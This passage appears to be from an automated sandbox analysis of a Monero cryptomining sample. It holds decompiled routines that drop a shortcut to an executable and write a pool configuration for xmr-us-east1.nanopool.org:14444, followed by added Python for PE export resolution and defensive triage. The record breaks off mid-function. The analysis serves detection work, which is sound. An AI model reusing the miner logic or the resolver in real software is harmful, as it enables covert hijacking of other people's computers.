0x00402f51 0x00402f65 0x00000000 0x00402f67 0x00402f67 0x00402f69 0x00402f74 0x00402f74
0x00402f53 0x00402f53 0x00402f53 0x00000000 0x00402f53 0x00402f1c 0x00402f1c 0x00402f23
0x00402f2f 0x00402f2f 0x00402f1a 0x00402e80 0x00402e86 0x00402e86 0x00402e5f 0x00402e5f
0x00402e5f 0x00402e5a

APIs
• NtOpenSection.NTDLL(00000000,0000000C,00000018,?,?,?,?,74B04D40,00000000,00000000), ref: 00402F15
Strings
Memory Dump Source
• Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: OpenSection
• String ID: @$NtClose$NtMapViewOfSection$NtOpenSection
• API String ID: 1950954290-3069760132
• Opcode ID: 17615c4fecd44b4c39521a1cccd82976107e2cb8dff730541d4d008ca0a3743f
• Instruction ID: 4647d7da09d8d8885e3b0c4b8fe7eb1682a85353f2c0fdbf0df9b865095ef5b3
• Opcode Fuzzy Hash: 17615c4fecd44b4c39521a1cccd82976107e2cb8dff730541d4d008ca0a3743f
• Instruction Fuzzy Hash: 1D319371A01219ABDB10DFA9DD45BDEB7B8EB04714F10416BE908F72C0D7B99A04DB98
Uniqueness

Uniqueness Score: -1.00%
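The three E00402F80(_t54, _t62, "...") calls in the function above hand the resolver the ntdll.dll base taken from the PEB loader list and get function pointers back; the resolver's body is not on this page. The following added example is not code from the sample or from the report: it shows the export-directory walk such a resolver has to perform on an already-mapped image (RVA == offset), which is an assumption about how E00402F80 works. `build_module`, `NTDLL_BASE`, the export RVAs and the `ZwClose` forwarder are constructed for the example and are not taken from the sample.

```python
import struct

# Added example (not code from the sample or the report). Mirrors what a resolver
# called as E00402F80(ctx, ntdll_base, "NtOpenSection") has to do: walk the export
# directory of a module that is already mapped, so RVA == offset. The module image
# used below is constructed for this example; it is not a real ntdll.dll.

IMAGE_DOS_SIGNATURE = 0x5A4D       # 'MZ'
IMAGE_NT_SIGNATURE = 0x00004550    # 'PE\0\0'
PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B


def _u16(img, off):
    return struct.unpack_from("<H", img, off)[0]


def _u32(img, off):
    return struct.unpack_from("<I", img, off)[0]


def _cstr(img, off):
    return img[off:img.index(b"\0", off)].decode("ascii")


def _resolve(image, base, name):
    if _u16(image, 0) != IMAGE_DOS_SIGNATURE:
        return None
    nt = _u32(image, 0x3C)                          # e_lfanew
    if _u32(image, nt) != IMAGE_NT_SIGNATURE:
        return None
    opt = nt + 0x18                                 # IMAGE_OPTIONAL_HEADER
    magic = _u16(image, opt)
    if magic == PE32_MAGIC:
        n_dirs, dirs = opt + 0x5C, opt + 0x60
    elif magic == PE32PLUS_MAGIC:
        n_dirs, dirs = opt + 0x6C, opt + 0x70
    else:
        return None
    if _u32(image, n_dirs) == 0:
        return None                                 # no DataDirectory at all
    exp_rva, exp_size = _u32(image, dirs), _u32(image, dirs + 4)   # entry 0: exports
    if exp_rva == 0:
        return None
    n_names = _u32(image, exp_rva + 0x18)           # IMAGE_EXPORT_DIRECTORY.NumberOfNames
    funcs = _u32(image, exp_rva + 0x1C)             # AddressOfFunctions
    names = _u32(image, exp_rva + 0x20)             # AddressOfNames
    ords = _u32(image, exp_rva + 0x24)              # AddressOfNameOrdinals
    for i in range(n_names):
        if _cstr(image, _u32(image, names + 4 * i)) != name:
            continue
        ordinal = _u16(image, ords + 2 * i)         # unbiased index into AddressOfFunctions
        rva = _u32(image, funcs + 4 * ordinal)
        if exp_rva <= rva < exp_rva + exp_size:     # forwarder: RVA points at "DLL.Name" text
            return _cstr(image, rva)
        return base + rva
    return None


def resolve_export(image: bytes, base: int, name: str):
    """Return base + RVA of export `name`, its forwarder string, or None."""
    try:
        return _resolve(image, base, name)
    except (struct.error, ValueError):              # truncated or malformed headers
        return None


def build_module(exports: dict) -> bytes:
    """Construct a minimal mapped PE32 image exporting `exports` ({name: rva or "DLL.Name"})."""
    img = bytearray(0x1000)
    struct.pack_into("<H", img, 0, IMAGE_DOS_SIGNATURE)
    struct.pack_into("<I", img, 0x3C, 0x40)                     # e_lfanew
    nt, exp = 0x40, 0x200
    struct.pack_into("<I", img, nt, IMAGE_NT_SIGNATURE)
    struct.pack_into("<H", img, nt + 0x14, 0xE0)                # SizeOfOptionalHeader (PE32)
    opt = nt + 0x18
    struct.pack_into("<H", img, opt, PE32_MAGIC)
    struct.pack_into("<I", img, opt + 0x5C, 16)                 # NumberOfRvaAndSizes
    struct.pack_into("<II", img, opt + 0x60, exp, 0x100)        # export directory RVA, size
    names = sorted(exports)                                     # linkers sort the name table
    funcs, name_tab, ord_tab, strs, fwd = 0x300, 0x340, 0x380, 0x400, exp + 0x28
    struct.pack_into("<IIIII", img, exp + 0x14, len(names), len(names), funcs, name_tab, ord_tab)
    for i, n in enumerate(names):
        target = exports[n]
        if isinstance(target, str):                             # forwarder text lives inside the export dir
            img[fwd:fwd + len(target) + 1] = target.encode("ascii") + b"\0"
            target, fwd = fwd, fwd + len(target) + 1
        struct.pack_into("<I", img, funcs + 4 * i, target)
        struct.pack_into("<I", img, name_tab + 4 * i, strs)
        struct.pack_into("<H", img, ord_tab + 2 * i, i)
        img[strs:strs + len(n) + 1] = n.encode("ascii") + b"\0"
        strs += len(n) + 1
    return bytes(img)


NTDLL_BASE = 0x77000000          # assumed base; the RVAs below are made up for the example
NTDLL_IMAGE = build_module({
    "NtOpenSection": 0x3510,
    "NtMapViewOfSection": 0x3420,
    "NtClose": 0x3200,
    "ZwClose": "NTDLL.NtClose",  # forwarded export, to exercise that branch
})

if __name__ == "__main__":
    for fn in ("NtOpenSection", "NtMapViewOfSection", "NtClose", "ZwClose", "NtNotExported"):
        print(f"{fn:20} -> {resolve_export(NTDLL_IMAGE, NTDLL_BASE, fn)!r}")
```

Pointed at a module read from disk instead of a mapped one, the same walk needs RVA-to-file-offset translation through the section headers; the sample avoids that by working on the image the loader (or its own NtMapViewOfSection) already placed in memory.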

                                                                                                                                          C-Code - Quality: 20%
                                                                                                                                          			E00407AF0(WCHAR* _a4, intOrPtr _a8) {
                                                                                                                                          				void* _v8;
                                                                                                                                          				long _v12;
                                                                                                                                          				void* _v16;
                                                                                                                                          				long _v20;
                                                                                                                                          				char _v24;
                                                                                                                                          				long _v28;
                                                                                                                                          				void* _v32;
                                                                                                                                          				long _v36;
                                                                                                                                          				long _v40;
                                                                                                                                          				long _v44;
                                                                                                                                          				long _v48;
                                                                                                                                          				intOrPtr _v52;
                                                                                                                                          				char* _v56;
                                                                                                                                          				long _v60;
                                                                                                                                          				void* _v64;
                                                                                                                                          				signed char _t35;
                                                                                                                                          				signed int _t36;
                                                                                                                                          				long _t45;
                                                                                                                                          				void* _t48;
                                                                                                                                          				void* _t54;
                                                                                                                                          
                                                                                                                                          				_t35 = GetFileAttributesW(_a4); // executed
                                                                                                                                          				if(_t35 == 0xffffffff || (_t35 & 0x00000010) != 0) {
                                                                                                                                          					asm("xorps xmm0, xmm0");
                                                                                                                                          					_v8 = 0;
                                                                                                                                          					_v64 = 0;
                                                                                                                                          					asm("movups [ebp-0x38], xmm0");
                                                                                                                                          					_v44 = 0;
                                                                                                                                          					_v16 = 0;
                                                                                                                                          					_v12 = 0;
                                                                                                                                          					_v40 = 0;
                                                                                                                                          					_v36 = 0;
                                                                                                                                          					_v32 = 0;
                                                                                                                                          					_v28 = 0;
                                                                                                                                          					_t36 = E00401B40(_a8);
                                                                                                                                          					_v20 = 0;
                                                                                                                                          					asm("xorps xmm0, xmm0");
                                                                                                                                          					asm("movq [ebp-0x14], xmm0");
                                                                                                                                          					_t54 = 2 + _t36 * 2;
                                                                                                                                          					_push(0);
                                                                                                                                          					_push(0);
                                                                                                                                          					_push( &_v24);
                                                                                                                                          					_push(_a4);
                                                                                                                                          					if( *0x5d10b8() != 1) {
                                                                                                                                          						L7:
                                                                                                                                          						return 0; // executed
                                                                                                                                          					} else {
                                                                                                                                          						_v64 = 0x18;
                                                                                                                                          						_v56 =  &_v24;
                                                                                                                                          						_v60 = 0;
                                                                                                                                          						_v52 = 0x40;
                                                                                                                                          						_v48 = 0;
                                                                                                                                          						_v44 = 0;
                                                                                                                                          						_t45 = NtCreateFile( &_v8, 0x120116,  &_v64,  &_v16,  &_v32, 0x80, 0, 0, 0x60, 0, 0); // executed
                                                                                                                                          						if(_t45 != 0) {
                                                                                                                                          							goto L7;
                                                                                                                                          						} else {
                                                                                                                                          							_t48 =  *0x5d10c0(_v8, 0, 0, 0,  &_v16, _a8, _t54,  &_v40, _t45); // executed
                                                                                                                                          							_push(_v8);
                                                                                                                                          							if(_t48 == 0) {
                                                                                                                                          								NtClose(); // executed
                                                                                                                                          								return 1;
                                                                                                                                          							} else {
                                                                                                                                          								NtClose();
                                                                                                                                          								goto L7;
                                                                                                                                          							}
                                                                                                                                          						}
                                                                                                                                          					}
                                                                                                                                          				} else {
                                                                                                                                          					return 1;
                                                                                                                                          				}
                                                                                                                                           			}

                                                                                                                                          APIs
                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,0040685B,?,?,?,.exe",?,?,?,[InternetShortcut]URL="file:///), ref: 00407AF9
                                                                                                                                          • RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 00407B84
                                                                                                                                          • NtCreateFile.NTDLL(00000000,00120116,00000018,00000000,00000000,00000080,00000000,00000000,00000060,00000000,00000000), ref: 00407BDF
                                                                                                                                          • NtWriteFile.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00407BFF
                                                                                                                                          • NtClose.NTDLL(00000000), ref: 00407C0C
                                                                                                                                          • NtClose.NTDLL(00000000), ref: 00407C19
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: File$ClosePath$AttributesCreateNameName_Write
                                                                                                                                          • String ID: @
                                                                                                                                          • API String ID: 2032416576-2766056989
                                                                                                                                          • Opcode ID: b68e2da1d8a01fec83c1ced52e1a281f962c96c99bbb349389263c075fbb7d0c
                                                                                                                                          • Instruction ID: 9f52158c82e738a9b8372dbf463c3a00265b35efd882e416b0d337a0f99a21ed
                                                                                                                                          • Opcode Fuzzy Hash: b68e2da1d8a01fec83c1ced52e1a281f962c96c99bbb349389263c075fbb7d0c
                                                                                                                                          • Instruction Fuzzy Hash: 0E314270D4020CBBEF10DF90DD49BDEBBB8EB04314F208256F904B62D0D7B66A989B95
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          C-Code - Quality: 35%
                                                                                                                                          			E00403BC0(char _a4) {
                                                                                                                                          				void* _v8;
                                                                                                                                          				long _v12;
                                                                                                                                          				void* _v16;
                                                                                                                                          				long _v20;
                                                                                                                                          				void* _v24;
                                                                                                                                          				long _v28;
                                                                                                                                          				long _v32;
                                                                                                                                          				long _v36;
                                                                                                                                          				long _v40;
                                                                                                                                          				intOrPtr _v44;
                                                                                                                                          				char* _v48;
                                                                                                                                          				long _v52;
                                                                                                                                          				void* _v56;
                                                                                                                                          				long _t29;
                                                                                                                                          				void* _t33;
                                                                                                                                          
                                                                                                                                          				asm("xorps xmm0, xmm0");
                                                                                                                                          				_v36 = 0;
                                                                                                                                          				asm("movups [ebp-0x30], xmm0");
                                                                                                                                          				_v8 = 0;
                                                                                                                                          				_v48 =  &_a4;
                                                                                                                                          				_v16 = 0;
                                                                                                                                          				_v12 = 0;
                                                                                                                                          				_v24 = 0;
                                                                                                                                          				_v20 = 0;
                                                                                                                                          				_v32 = 0;
                                                                                                                                          				_v28 = 0;
                                                                                                                                          				_v56 = 0x18;
                                                                                                                                          				_v52 = 0;
                                                                                                                                          				_v44 = 0x40;
                                                                                                                                          				_v40 = 0;
                                                                                                                                          				_v36 = 0;
                                                                                                                                           				_t29 = NtCreateFile( &_v8, 0x120116,  &_v56,  &_v16,  &_v24, 0x80, 0, 0, 0x60, 0, 0); // executed; DesiredAccess 0x120116 = FILE_GENERIC_WRITE, ObjectAttributes at _v56 (Length 0x18, ObjectName = the string passed in _a4, Attributes 0x40 = OBJ_CASE_INSENSITIVE), FileAttributes 0x80 = FILE_ATTRIBUTE_NORMAL, ShareAccess 0, CreateDisposition 0 = FILE_SUPERSEDE (any existing file is replaced), CreateOptions 0x60 = FILE_SYNCHRONOUS_IO_NONALERT | FILE_NON_DIRECTORY_FILE
                                                                                                                                          				if(_t29 != 0) {
                                                                                                                                          					L3:
                                                                                                                                          					return 0;
                                                                                                                                          				} else {
                                                                                                                                           					_t33 =  *0x5d10c0(_v8, 0, 0, 0,  &_v16, "xmr-us-east1.nanopool.org:14444", 0xcc8,  &_v32, _t29); // executed; the pointer at 0x5d10c0 holds NtWriteFile (APIs below, ref 00403C78): writes 0xcc8 (3272) bytes from the buffer that begins with the pool endpoint string, i.e. the miner configuration
                                                                                                                                          					_push(_v8);
                                                                                                                                          					if(_t33 == 0) {
                                                                                                                                          						NtClose();
                                                                                                                                          						return 1;
                                                                                                                                          					} else {
                                                                                                                                          						NtClose();
                                                                                                                                          						goto L3;
                                                                                                                                          					}
                                                                                                                                          				}
                                                                                                                                           			}

                                                                                                                                          APIs
                                                                                                                                          • NtCreateFile.NTDLL(00000000,00120116,?,00403B8C,?,00000080,00000000,00000000,00000060,00000000,00000000), ref: 00403C52
                                                                                                                                          • NtWriteFile.NTDLL(00000000,00000000,00000000,00000000,00000000,xmr-us-east1.nanopool.org:14444,00000CC8,00000000,00000000), ref: 00403C78
                                                                                                                                          • NtClose.NTDLL(00000000), ref: 00403C85
                                                                                                                                          • NtClose.NTDLL(00000000), ref: 00403C91
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CloseFile$CreateWrite
                                                                                                                                          • String ID: @$xmr-us-east1.nanopool.org:14444
                                                                                                                                          • API String ID: 3559581051-493715795
                                                                                                                                          • Opcode ID: 56d88aa81e982c61328a5cbb6ae928bc3dbf0937083e45afe5ced92eb89ea321
                                                                                                                                          • Instruction ID: 92c5b12b779cf31cce4769230797ba73a26a306a4adc66bd02839d29b74e70ae
                                                                                                                                          • Opcode Fuzzy Hash: 56d88aa81e982c61328a5cbb6ae928bc3dbf0937083e45afe5ced92eb89ea321
                                                                                                                                          • Instruction Fuzzy Hash: A521EDB1E4120DBBEB10DF90DD49BDFBBB8EB04704F204256F904B62C0D7B95A489B99
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%
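The two decompiled routines above leave two kinds of on-disk indicator: the first drops an `[InternetShortcut]` file whose `URL="file:///...exe"` points at a local executable (see the stack strings at ref 00407AF9), and `E00403BC0` supersedes a file and writes a 0xCC8-byte block that begins with the pool endpoint `xmr-us-east1.nanopool.org:14444`. The Python below is an added triage helper, not part of the Joe Sandbox report or of the sample: it pulls `host:port` endpoints (ASCII and UTF-16LE) and `.url` targets out of a dropped file or memory dump and flags hosts under known mining-pool domains. Everything except the nanopool endpoint is an assumption made for the example: the pool-domain list beyond nanopool.org is illustrative, and the `example.exe` path, the `updates.example.com:443` endpoint and the JSON wrapper in the constructed sample blob are made up.

```python
"""Added triage helper (not part of the sandbox report or the sample): extract
miner pool endpoints and InternetShortcut targets from a dropped file or dump."""
from __future__ import annotations

import json
import re
import sys
from typing import Iterator

# Illustrative pool-domain suffixes (assumption: extend from your own intel).
KNOWN_POOL_SUFFIXES = (
    "nanopool.org",
    "supportxmr.com",
    "hashvault.pro",
    "minexmr.com",
    "2miners.com",
)

# host:port with a dotted DNS name; the lookbehind stops us from matching the
# tail of a longer token such as a URL path.
_ENDPOINT_RE = re.compile(
    rb"(?<![\w.-])"
    rb"([a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?(?:\.[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?)+)"
    rb":(\d{2,5})(?!\d)",
    re.IGNORECASE,
)

# The dropper's stack strings show '[InternetShortcut]URL="file:///' ... '.exe"';
# accept that quoted form and the unquoted form of an ordinary .url file.
_SHORTCUT_RE = re.compile(
    rb'\[InternetShortcut\]\s*URL="?(file:///[^"\r\n\x00]+)"?',
    re.IGNORECASE,
)


def _narrow_views(blob: bytes) -> Iterator[bytes]:
    """Yield the blob as-is, then its UTF-16LE content (both byte alignments)
    folded to ASCII so wide strings are searched by the same byte regexes.
    Code units outside ASCII are dropped, so narrow text does not leak through."""
    yield blob
    for offset in (0, 1):
        wide = blob[offset:].decode("utf-16-le", errors="ignore")
        yield wide.encode("ascii", errors="ignore")


def extract_endpoints(blob: bytes) -> list[tuple[str, int]]:
    """All distinct host:port pairs found in any view, sorted."""
    found: set[tuple[str, int]] = set()
    for view in _narrow_views(blob):
        for host, port in _ENDPOINT_RE.findall(view):
            found.add((host.decode("ascii").lower(), int(port)))
    return sorted(found)


def is_known_pool(host: str) -> bool:
    """True when host is, or is a subdomain of, a listed pool domain."""
    host = host.lower()
    return any(host == s or host.endswith("." + s) for s in KNOWN_POOL_SUFFIXES)


def extract_shortcut_targets(blob: bytes) -> list[str]:
    """file:/// targets of every InternetShortcut stanza in the blob."""
    targets = {t.decode("ascii", errors="replace")
               for view in _narrow_views(blob)
               for t in _SHORTCUT_RE.findall(view)}
    return sorted(targets)


def triage(blob: bytes) -> dict[str, list]:
    endpoints = extract_endpoints(blob)
    return {
        "pool_endpoints": [e for e in endpoints if is_known_pool(e[0])],
        "other_endpoints": [e for e in endpoints if not is_known_pool(e[0])],
        "shortcut_targets": extract_shortcut_targets(blob),
    }


# Constructed sample standing in for the 0xCC8-byte block the sample writes plus
# a dropped .url file. Only the nanopool endpoint comes from the report; the
# example.exe path and the example.com endpoint are made up, and the second copy
# of the pool string is UTF-16LE to exercise the wide-string path.
SAMPLE_BLOB = (
    b'[InternetShortcut]\r\nURL="file:///C:/Users/Public/example.exe"\r\n'
    + b"\x00" * 32
    + b'{"url": "xmr-us-east1.nanopool.org:14444", "tls": false}'
    + b"\x00" * 16
    + b"updates.example.com:443"
    + b"\x00" * 8
    + "xmr-us-east1.nanopool.org:14444".encode("utf-16-le")
).ljust(0xCC8, b"\x00")


if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_BLOB
    print(json.dumps(triage(data), indent=2))
```

Run it as `python triage.py <dropped file or .sdmp>`; with no argument it triages the constructed blob. The pool check matches on domain suffix rather than full host because miners rotate regional front-ends (`xmr-us-east1`, `xmr-eu1`, ...) under one pool domain, while the port is left unfiltered since stratum ports vary per pool.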

                                                                                                                                          APIs
                                                                                                                                          • NtCreateFile.NTDLL(005D2DF0,00120089,?,]D@,00000000,00000080,00000001,00000001,00000060,00000000,00000000), ref: 004037A4
                                                                                                                                          • NtCreateFile.NTDLL(005D2124,00120089,?,]D@,00000000,00000080,00000001,00000001,00000060,00000000,00000000), ref: 004037C1
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CreateFile
                                                                                                                                          • String ID: @$]D@
                                                                                                                                          • API String ID: 823142352-925688143
                                                                                                                                          • Opcode ID: 03611e97650f41380acb2e73d0c1b10cf4d46751ae042211fc88b9fc410341d6
                                                                                                                                          • Instruction ID: 29e337131a3785b045790d3cbff8cd25c944f4b1d8e7a2be103306273d9b840e
                                                                                                                                          • Opcode Fuzzy Hash: 03611e97650f41380acb2e73d0c1b10cf4d46751ae042211fc88b9fc410341d6
                                                                                                                                          • Instruction Fuzzy Hash: CD118FB0A4130DABEB20DF90CD49BDEBBF8BB18315F10835BE514B62C0D7B556488B98
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          C-Code - Quality: 18%
                                                                                                                                          			// Converts the DOS path in _a4 to an NT path and opens it read-only with NtCreateFile;
                                                                                                                                          			// the resulting handle is written to the global at 0x5d2dfc (first NtCreateFile argument).
                                                                                                                                          			E00406990(char _a4) {
                                                                                                                                          				char _v12;        // UNICODE_STRING filled in by RtlDosPathNameToNtPathName_U
                                                                                                                                          				long _v16;
                                                                                                                                          				void* _v20;       // AllocationSize (left at 0)
                                                                                                                                          				long _v24;
                                                                                                                                          				void* _v28;       // IO_STATUS_BLOCK
                                                                                                                                          				long _v32;        // OBJECT_ATTRIBUTES.SecurityQualityOfService
                                                                                                                                          				long _v36;        // OBJECT_ATTRIBUTES.SecurityDescriptor
                                                                                                                                          				intOrPtr _v40;    // OBJECT_ATTRIBUTES.Attributes
                                                                                                                                          				char* _v44;       // OBJECT_ATTRIBUTES.ObjectName
                                                                                                                                          				long _v48;        // OBJECT_ATTRIBUTES.RootDirectory
                                                                                                                                          				void* _v52;       // OBJECT_ATTRIBUTES.Length
                                                                                                                                          				long _t25;
                                                                                                                                          
                                                                                                                                          				_t1 =  &_v12; // 0x406875
                                                                                                                                          				_v52 = 0;
                                                                                                                                          				_t3 =  &_a4; // 0x406875
                                                                                                                                          				asm("xorps xmm0, xmm0");          // zero the stack structures 16 bytes at a time
                                                                                                                                          				_v32 = 0;
                                                                                                                                          				asm("movups [ebp-0x2c], xmm0");
                                                                                                                                          				_v28 = 0;
                                                                                                                                          				_v24 = 0;
                                                                                                                                          				_v20 = 0;
                                                                                                                                          				_v16 = 0;
                                                                                                                                          				asm("movq [ebp-0x8], xmm0");
                                                                                                                                          				 *0x5d10b8( *_t3, _t1, 0, 0);     // RtlDosPathNameToNtPathName_U(_a4, &_v12, NULL, NULL), called through an import slot (ref 004069D7 in the APIs list)
                                                                                                                                          				_v52 = 0x18;                      // Length = sizeof(OBJECT_ATTRIBUTES) on 32-bit Windows
                                                                                                                                          				_v44 =  &_v12;                    // ObjectName = the converted NT path
                                                                                                                                          				_v48 = 0;                         // RootDirectory = NULL
                                                                                                                                          				_v40 = 0x40;                      // Attributes = OBJ_CASE_INSENSITIVE
                                                                                                                                          				_v36 = 0;
                                                                                                                                          				_v32 = 0;
                                                                                                                                          				// NtCreateFile(&handle @0x5d2dfc, FILE_GENERIC_READ (0x120089), &ObjectAttributes, &IoStatusBlock, &AllocationSize (0),
                                                                                                                                          				//              FILE_ATTRIBUTE_NORMAL (0x80), ShareAccess = 0 (exclusive), FILE_OPEN (1),
                                                                                                                                          				//              FILE_SYNCHRONOUS_IO_NONALERT | FILE_NON_DIRECTORY_FILE (0x60), EaBuffer = NULL, EaLength = 0)
                                                                                                                                          				_t25 = NtCreateFile(0x5d2dfc, 0x120089,  &_v52,  &_v28,  &_v20, 0x80, 0, 1, 0x60, 0, 0); // executed
                                                                                                                                          				return _t25;                      // NTSTATUS of the open
                                                                                                                                          			}

                                                                                                                                          Instruction addresses (one per statement above): 0x0040699a to 0x00406a34

                                                                                                                                          APIs
                                                                                                                                          • RtlDosPathNameToNtPathName_U.NTDLL(uh@,uh@,00000000,00000000), ref: 004069D7
                                                                                                                                          • NtCreateFile.NTDLL(005D2DFC,00120089,00000018,00000000,00000000,00000080,00000000,00000001,00000060,00000000,00000000), ref: 00406A2B
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Path$CreateFileNameName_
                                                                                                                                          • String ID: uh@$uh@
                                                                                                                                          • API String ID: 3479931691-972736353
                                                                                                                                          • Opcode ID: 45a6eada9ea1dd906960385c986ed5d86993abecfb8ffa17f30c1ee7e5eb38c1
                                                                                                                                          • Instruction ID: 0c139073421148209480b6c35fda580d69656a2aecaa2f90744c4bda58df8354
                                                                                                                                          • Opcode Fuzzy Hash: 45a6eada9ea1dd906960385c986ed5d86993abecfb8ffa17f30c1ee7e5eb38c1
                                                                                                                                          • Instruction Fuzzy Hash: E811DBB4D5031DABEB10DF90CD49BEEBBB8BB04704F10420AE9007A2C0D7B522988F99
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          C-Code - Quality: 82%
                                                                                                                                          			// Wraps E00403BC0/E00403680 between two identical calls to E00401CE0 on the embedded strings.
                                                                                                                                          			// "xmr-us-east1.nanopool.org:14444" is nanopool's Monero (XMR) stratum endpoint; what E00401CE0
                                                                                                                                          			// does with the 16-character string (length 0x10 is passed with it) is not resolved in this report.
                                                                                                                                          			E00403B50(void* __edx, char _a4, intOrPtr _a8) {
                                                                                                                                          				void* _t6;
                                                                                                                                          				void* _t7;
                                                                                                                                          				void* _t11;
                                                                                                                                          				void* _t12;
                                                                                                                                          				void* _t13;
                                                                                                                                          				void* _t14;
                                                                                                                                          
                                                                                                                                          				_t11 = __edx;
                                                                                                                                          				E00401CE0("0125789244697858", 0x10, "xmr-us-east1.nanopool.org:14444", 0xcc8);
                                                                                                                                          				_t6 =  *0x5d2df4; // 0x3bc            global handle
                                                                                                                                          				_t13 = _t12 + 0x10;                   // cdecl stack cleanup after the 4-argument call
                                                                                                                                          				if(_t6 != 0 && _t6 != 0xffffffff) {   // skip NULL and INVALID_HANDLE_VALUE
                                                                                                                                          					NtClose(_t6);
                                                                                                                                          				}
                                                                                                                                          				_push(_a8);
                                                                                                                                          				_t7 = E00403BC0(_a4); // executed
                                                                                                                                          				_t14 = _t13 + 8;
                                                                                                                                          				if(_t7 != 0) {                        // only on success of E00403BC0
                                                                                                                                          					_push(_a8);
                                                                                                                                          					E00403680(_t11, _a4); // executed
                                                                                                                                          					_t14 = _t14 + 8;
                                                                                                                                          				}
                                                                                                                                          				return E00401CE0("0125789244697858", 0x10, "xmr-us-east1.nanopool.org:14444", 0xcc8);
                                                                                                                                          			}

                                                                                                                                          Instruction addresses (one per statement above): 0x00403b50 to 0x00403bbb

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Close
                                                                                                                                          • String ID: 0125789244697858$0125789244697858$xmr-us-east1.nanopool.org:14444
                                                                                                                                          • API String ID: 3535843008-899868268
                                                                                                                                          • Opcode ID: 05ddcafc9e6955f83f09dbcfd663fe33b0abdaadcb5b8f1db937436fe77c1a83
                                                                                                                                          • Instruction ID: b842e7685c2f69810a8eda15092c5b8a142aacb66778a7cb45de6b9a8cdd56ec
                                                                                                                                          • Opcode Fuzzy Hash: 05ddcafc9e6955f83f09dbcfd663fe33b0abdaadcb5b8f1db937436fe77c1a83
                                                                                                                                          • Instruction Fuzzy Hash: 5EF0B43168120476EF203F999C03E493E585B2475EF004527FE18742E3E5BAD275955E
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          C-Code - Quality: 63%
                                                                                                                                          			// Liveness check for the PID in _a4: open the process with PROCESS_QUERY_INFORMATION and test whether
                                                                                                                                          			// GetExitCodeProcess reports STILL_ACTIVE (0x103). Returns 1 if running, 0 if it exited or could not be
                                                                                                                                          			// opened (or PID 0), and -1 if GetExitCodeProcess failed.
                                                                                                                                          			E00408A50(void* _a4) {
                                                                                                                                          				long _v8;         // exit code out-parameter
                                                                                                                                          				long _v12;        // CLIENT_ID.UniqueThread
                                                                                                                                          				void* _v16;       // CLIENT_ID.UniqueProcess
                                                                                                                                          				long _v20;        // OBJECT_ATTRIBUTES.SecurityQualityOfService
                                                                                                                                          				long _v24;        // OBJECT_ATTRIBUTES.SecurityDescriptor
                                                                                                                                          				long _v28;        // OBJECT_ATTRIBUTES.Attributes
                                                                                                                                          				long _v32;        // OBJECT_ATTRIBUTES.ObjectName
                                                                                                                                          				long _v36;        // OBJECT_ATTRIBUTES.RootDirectory
                                                                                                                                          				void* _v40;       // OBJECT_ATTRIBUTES.Length
                                                                                                                                          				void* _t21;
                                                                                                                                          				void* _t27;
                                                                                                                                          				int _t28;
                                                                                                                                          
                                                                                                                                          				_t21 = _a4;
                                                                                                                                          				if(_t21 != 0) {
                                                                                                                                          					_v16 = _t21;                  // CLIENT_ID.UniqueProcess = pid
                                                                                                                                          					_a4 = 0;                      // argument slot reused as the output HANDLE
                                                                                                                                          					_v40 = 0x18;                  // sizeof(OBJECT_ATTRIBUTES) on 32-bit Windows
                                                                                                                                          					_v36 = 0;
                                                                                                                                          					_v28 = 0;
                                                                                                                                          					_v32 = 0;
                                                                                                                                          					_v24 = 0;
                                                                                                                                          					_v20 = 0;
                                                                                                                                          					_v12 = 0;                     // CLIENT_ID.UniqueThread = 0 (open by PID only)
                                                                                                                                          					// NtOpenProcess(&handle, PROCESS_QUERY_INFORMATION (0x400), &ObjectAttributes, &ClientId); non-zero NTSTATUS = failure
                                                                                                                                          					if(NtOpenProcess( &_a4, 0x400,  &_v40,  &_v16) != 0) {
                                                                                                                                          						goto L1;
                                                                                                                                          					} else {
                                                                                                                                          						_t27 = _a4;
                                                                                                                                          						if(_t27 == 0) {
                                                                                                                                          							goto L1;
                                                                                                                                          						} else {
                                                                                                                                          							_v8 = 0;
                                                                                                                                          							_t28 = GetExitCodeProcess(_t27,  &_v8); // executed
                                                                                                                                          							_push(_a4);               // handle argument for the NtClose below (decompiler shows the push separately)
